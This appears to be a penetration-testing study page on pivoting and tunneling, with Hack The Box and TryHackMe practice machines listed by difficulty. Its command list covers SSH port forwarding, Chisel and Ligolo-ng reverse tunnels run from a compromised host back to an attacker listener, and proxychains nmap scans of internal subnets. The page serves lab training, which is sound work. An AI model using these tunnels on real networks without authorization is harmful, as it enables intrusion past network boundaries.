Pivoting and Tunneling: practice machines and key commands
Pivoting uses a compromised host as a relay into networks you cannot reach directly. The simplest tool is SSH: -L forwards a local port to an internal service, -R exposes a port from the target back to you, and -D creates a SOCKS proxy that proxychains can use for scanners. When SSH is not available, Chisel and Ligolo-ng provide reverse tunnels over a single outbound connection, and Windows hosts can use netsh portproxy. Scan through the tunnel with full connect scans, since SYN scans do not traverse SOCKS. Map the internal subnets with ip a and arp, then repeat enumeration on each new segment. Keep a diagram of which tunnel leads where. The boxes listed require reaching a second network.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
SSH Dynamic Port Forwarding (SOCKS5)
Open a local SOCKS5 proxy on port 1080 routed through target SSH host.
ssh -D 1080 -f -C -q -N {USER}@{TARGET_IP}SSH Local Port Forwarding (-L)
Forward target internal port (e.g. 8443) to local port 9999 on attacker machine.
ssh -L 9999:127.0.0.1:8443 {USER}@{TARGET_IP} -NSSH Reverse Remote Forwarding (-R)
Expose local port or listener on compromised host back to attacker machine.
ssh -R {LPORT}:127.0.0.1:80 {USER}@{LHOST} -NChisel Attacker Reverse Tunnel Server
Start Chisel reverse tunnel listener on attacker machine on port 8000.
./chisel server -p 8000 --reverseChisel Victim Reverse Socks Pivot
Connect back to attacker server and open socks5 proxy port 1080 to access internal network.
./chisel client {LHOST}:8000 R:socksLigolo-ng High-Performance TUN Interface Pivot
Fast userland tunnel creating real system tun adapter for seamless Nmap/Metasploit routing.
# On Attacker:
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# On Compromised Host:
./agent -connect {LHOST}:11601 -ignore-cert
# Add route on Attacker:
sudo ip route add 172.16.1.0/24 dev ligoloProxychains TCP Full Connect Nmap Scan
Route Nmap port scan through SOCKS proxy tunnel to scan internal networks.
proxychains4 -q nmap -sT -Pn -p 21,22,80,445,3389,8080 172.16.1.10
Keep going
- Methodology: Phase 06: Internal System & Network Reconnaissance
- Cheatsheet: Pivoting & Tunnels
Pivoting and Tunneling machines (25)
Machines are matched by their technique tags. 20 Linux, 5 Windows.
Very Easy (1)
| Machine | Platform | OS |
|---|---|---|
| Funnel | HTB | Linux |
Easy (7)
| Machine | Platform | OS |
|---|---|---|
| Alert | HTB | Linux |
| Buff | HTB | Windows |
| Chemistry | HTB | Linux |
| Horizontall | HTB | Linux |
| PC | HTB | Linux |
| Sea | HTB | Linux |
| Sightless | HTB | Linux |
Medium (8)
| Machine | Platform | OS |
|---|---|---|
| Bagel | HTB | Linux |
| Flight | HTB | Windows |
| Format | HTB | Linux |
| Lateral Movement and Pivoting | THM | Windows |
| Only4You | HTB | Linux |
| Sandworm | HTB | Linux |
| Shared | HTB | Linux |
| Surveillance | HTB | Linux |
Hard (8)
| Machine | Platform | OS |
|---|---|---|
| Borderlands | THM | Linux |
| ForwardSlash | HTB | Linux |
| Internal | THM | Linux |
| RainyDay | HTB | Linux |
| Throwback | THM | Windows |
| VulnNet: Internal | THM | Linux |
| Wreath | THM | Windows |
| Year of the Fox | THM | Linux |
Insane (1)
| Machine | Platform | OS |
|---|---|---|
| Reddish | HTB | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox